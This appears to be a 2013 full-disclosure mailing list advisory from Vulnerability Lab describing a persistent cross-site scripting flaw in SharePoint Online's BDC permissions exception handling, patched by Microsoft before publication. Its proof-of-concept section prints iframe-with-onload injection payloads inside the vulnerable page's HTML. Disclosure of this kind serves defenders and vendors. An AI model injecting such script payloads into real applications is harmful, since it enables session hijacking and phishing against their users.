[<prev] [next>] [day] [month] [year] [list]
Message-ID: <51BB3DE0.1090201@vulnerability-lab.com>
Date: Fri, 14 Jun 2013 16:59:28 +0100
From: Vulnerability Lab <admin@...nerability-lab.com>
To: full-disclosure@...ts.grok.org.uk
Subject: 0day - Microsoft SharePoint (Cloud) - Persistent
Exception-Handling Web Vulnerability
Title:
======
Microsoft SharePoint (Cloud) - Persistent Exception-Handling Web
Vulnerability
Date:
=====
2013-06-14
References:
===========
http://www.vulnerability-lab.com/get_content.php?id=812
Microsoft Security Response Center (MSRC) ID: 14096
Microsoft Security Response Center (MSRC) MANAGER: JT
MSRC Security Bulletin Acknowledgment: June
VL-ID:
=====
812
Common Vulnerability Scoring System:
====================================
5.7
Introduction:
=============
Microsoft SharePoint is a Web application platform developed by
Microsoft. First launched in 2001, SharePoint has historically been
associated with intranet content management and document management, but
recent versions have significantly broader capabilities.
Microsoft has two versions of SharePoint available at no cost, but it
sells premium editions with additional functionality, and
provides a cloud service edition as part of their Office 365 platform
(previously BPOS). The product is also sold through a cloud
model by many third-party vendors.
SharePoint comprises a multipurpose set of Web technologies backed by a
common technical infrastructure. By default, SharePoint has a
Microsoft Office-like interface, and it is closely integrated with the
Office suite. The web tools are designed to be usable by non-
technical users. SharePoint can be used to provide intranet portals,
document & file management, collaboration, social networks, extranets,
websites, enterprise search, and business intelligence. It also has
system integration, process integration, and workflow automation
capabilities.
Enterprise application software (e.g. ERP or CRM packages) often provide
some SharePoint integration capability, and SharePoint also
incorporates a complete development stack based on web technologies and
standards-based APIs. As an application platform, SharePoint provides
central management, governance, and security controls for implementation
of these requirements. The SharePoint platform integrates directly
into IIS - enabling bulk management, scaling, and provisioning of
servers, as is often required by large organizations or cloud hosting
providers.
In 2008, the Gartner Group put SharePoint in the`leaders` quadrant in
three of its Magic Quadrants (for search, portals, and enterprise content
management). SharePoint is used by 78% of Fortune 500 companies[citation
needed]. Between 2006 to 2011, Microsoft sold over 36.5 million user
licenses[citation needed].
(Copy of the Homepage: http://en.wikipedia.org/wiki/Microsoft_SharePoint )
Abstract:
=========
The Vulnerability Laboratory Research Team discovered a persistent web
vulnerability in the official Microsoft Sharepoint Online (cloud-based)
application.
Report-Timeline:
================
2013-02-01: Researcher Notification & Coordination
2013-02-06: Vendor Notification (Microsoft Security Response Center - MSRC)
2013-02-07: Vendor Response/Feedback (Microsoft Security Response Center
- MSRC)
2013-06-10: Vendor Fix/Patch (Microsoft Development Team)
2013-06-14: Public Disclosure (Vulnerability Laboratory)
Status:
========
Published
Affected Products:
==================
Microsoft Corp.
Product: Sharepoint Online (Cloud-Based) - Office 365
Exploitation-Technique:
=======================
Remote
Severity:
=========
High
Details:
========
A persistent input validation vulnerability is detected in the official
Microsoft Sharepoint Online (cloud-based) application.
The vulnerability allows remote attackers to inject own malicious script
code in the vulnerable module on application side (persistent).
The vulnerability is located in the `Sharepoint Online Cloud Service`
section when processing to request via the `Berechtigungen für den
Metadatenspeicher festlegen` module the bound vulnerable
ms-descriptionText >
ctl00_PlaceHolderDialogBodySection_PlaceHolderDialogBody
MainSection_ValSummary application parameter. The persistent injected
script code will be executed directly out of the `invalid BDC
Übereinstimmung` web application exception-handling.
The vulnerability can be exploited with a low (restricted) privilege
application user account and low or medium required user interaction.
Successful exploitation of the vulnerability result in persistent
session hijacking, persistent phishing, stable external redirect, stable
external malware loads and persistent vulnerable module context
manipulation.
Vulnerable Service(s):
[+] Microsoft - Sharepoint Online (cloud-based)
Vulnerable Module(s):
[+] Berechtigungen für den Metadatenspeicher festlegen - BDC
Metadatenspeicher zuweisen
Vulnerable Parameter(s):
[+] ms-descriptionText >
ctl00_PlaceHolderDialogBodySection_PlaceHolderDialogBodyMainSection_ValSummary
Affected Module(s):
[+] BDC Übereinstimmung > Exception Handling
Proof of Concept:
=================
The persistent input validation web vulnerability can be exploited by
remote attackers with low required user interaction and low privileged
sharepoint cloud application user account. For demonstration or
reproduce ...
Review: Berechtigungen für den Metadatenspeicher festlegen - Summery >
BDC Übereinstimmung > Exception
<table class="propertysheet" border="0" cellpadding="0" cellspacing="0"
width="100%"> <tbody><tr> <td class="ms-descriptionText">
<span
id="ctl00_PlaceHolderDialogBodySection_PlaceHolderDialogBodyMainSection_LabelMessage"
class="ms-descriptionText"></span> </td>
</tr> <tr> <td class="ms-error"><span
id="ctl00_PlaceHolderDialogBodySection_PlaceHolderDialogBodyMainSection_LabelErrorMessage">
Fehler beim Versuch, 'IMetadataCatalog' eine Zugriffssteuerungsliste mit
dem
Namen 'ApplicationRegistry' zuzuweisen. Mindestens ein Benutzer oder
eine Gruppe in der Zugriffssteuerungsliste muss über das Recht
'SetPermissions' verfügen, um das Erstellen eines nicht verwaltbaren
Objekts zu verhindern.</span></td> </tr> <tr> <td
class="ms-descriptionText">
<div
id="ctl00_PlaceHolderDialogBodySection_PlaceHolderDialogBodyMainSection_ValSummary"
style="color:Red;">Mindestens ein Fehler auf der Seite.
Beheben Sie Folgendes, bevor Sie fortfahren:<ul><li>Es wurde keine
exakte Übereinstimmung
für <iframe
src="TA_ManageBDCPermissions_data/a.txt">%20%20%20%20"><iframe
src=http://www.vulnerability-lab.com onload=alert("VL") <<iframe
src=a>%20%20%20%20"><iframe src=http://www.vulnerability-lab.com
onload=alert("VL") <
gefunden.</li></ul>
</div> </td> </tr> </table>
<table border="0" cellspacing="0" cellpadding="0" width="100%"
class="ms-authoringcontrols">
<tr>
<td>
----------
<table class="propertysheet" border="0" cellpadding="0" cellspacing="0"
width="100%"> <tbody><tr> <td class="ms-descriptionText">
<span
id="ctl00_PlaceHolderDialogBodySection_PlaceHolderDialogBodyMainSection_LabelMessage"
class="ms-descriptionText"></span> </td>
</tr> <tr> <td class="ms-error"><span
id="ctl00_PlaceHolderDialogBodySection_PlaceHolderDialogBodyMainSection_LabelErrorMessage">
Fehler beim Versuch, 'IMetadataCatalog' eine Zugriffssteuerungsliste mit
dem
Namen 'ApplicationRegistry' zuzuweisen. Mindestens ein Benutzer oder
eine Gruppe in der Zugriffssteuerungsliste muss über das Recht
'SetPermissions' verfügen, um das Erstellen eines nicht verwaltbaren
Objekts zu verhindern.</span></td> </tr> <tr> <td
class="ms-descriptionText">
<div
id="ctl00_PlaceHolderDialogBodySection_PlaceHolderDialogBodyMainSection_ValSummary"
style="color:Red;">Mindestens ein Fehler auf der Seite.
Beheben Sie Folgendes, bevor Sie fortfahren:<ul><li>Es wurde keine
exakte Übereinstimmung
für <iframe
src="TA_ManageBDCPermissions_data/a.txt">%20%20%20%20"><[PERSISTENT
INJECTED SCRIPT CODE!]) <<[PERSISTENT INJECTED SCRIPT CODE!]>
%20[PERSISTENT INJECTED SCRIPT CODE!]) <
gefunden.</li></ul>
</div> </td> </tr> </table>
<table border="0" cellspacing="0" cellpadding="0" width="100%"
class="ms-authoringcontrols">
<tr>
<td>
--- Exception Handling (DE) ---
Sie können Administratoren des BDC-Metadatenspeichers zuweisen, indem
Sie unten Berechtigungen festlegen.
Fehler beim Versuch, 'IMetadataCatalog' eine Zugriffssteuerungsliste mit
dem Namen 'ApplicationRegistry' zuzuweisen.
Mindestens ein Benutzer oder eine Gruppe in der Zugriffssteuerungsliste
muss über das Recht 'SetPermissions' verfügen,
um das Erstellen eines nicht verwaltbaren Objekts zu verhindern.
Mindestens ein Fehler auf der Seite. Beheben Sie Folgendes,
bevor Sie fortfahren: Es wurde keine exakte Übereinstimmung für ...
[Injected Context] ... gefunden/festgestellt.
Sie können Administratoren des BDC-Metadatenspeichers zuweisen, indem
Sie unten Berechtigungen festlegen
---
Note: (US)
After you’ve added your domain name to Office 365 to use with SharePoint
Online and Lync Online, you can create email addresses,
Lync Online accounts, and distribution groups that use your custom
domain name. You can also use your domain name for a public
website hosted on SharePoint Online but there are Use SharePoint Online
on a custom domain together with other services.
Reference(s):
https://benjamin23-admin.sharepoint.com/default.aspx
https://benjamin23-admin.sharepoint.com/_layouts/bdc/TA_ViewBDCApplication.aspx
Risk:
=====
The security risk of the of the persistent input validation
vulnerability is estimated as high(-) because of the location in the
core exception-handling.
Credits:
========
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri
(bkm@...nerability-lab.com)
Disclaimer:
===========
The information provided in this advisory is provided as it is without
any warranty. Vulnerability-Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability
and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including
direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers
have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any
vendor licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com -
www.vulnerability-lab.com/register
Contact: admin@...nerability-lab.com - support@...nerability-lab.com -
research@...nerability-lab.com
Section: video.vulnerability-lab.com - forum.vulnerability-lab.com -
news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab -
youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php -
vulnerability-lab.com/rss/rss_upcoming.php -
vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partially usages, of this
file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified
form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers.
All pictures, texts, advisories, source code, videos and
other information on this website is trademark of vulnerability-lab team
& the specific authors or managers. To record, list (feed),
modify, use or edit our material contact (admin@...nerability-lab.com or
support@...nerability-lab.com) to get a permission.
Copyright © 2013 | Vulnerability Laboratory
--
VULNERABILITY RESEARCH LABORATORY
LABORATORY ADMINISTRATION
CONTACT: admin@...nerability-lab.com
Download attachment "Pictures.rar" of type "application/octet-stream" (697758 bytes)
Download attachment "PoC.rar" of type "application/octet-stream" (844378 bytes)
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists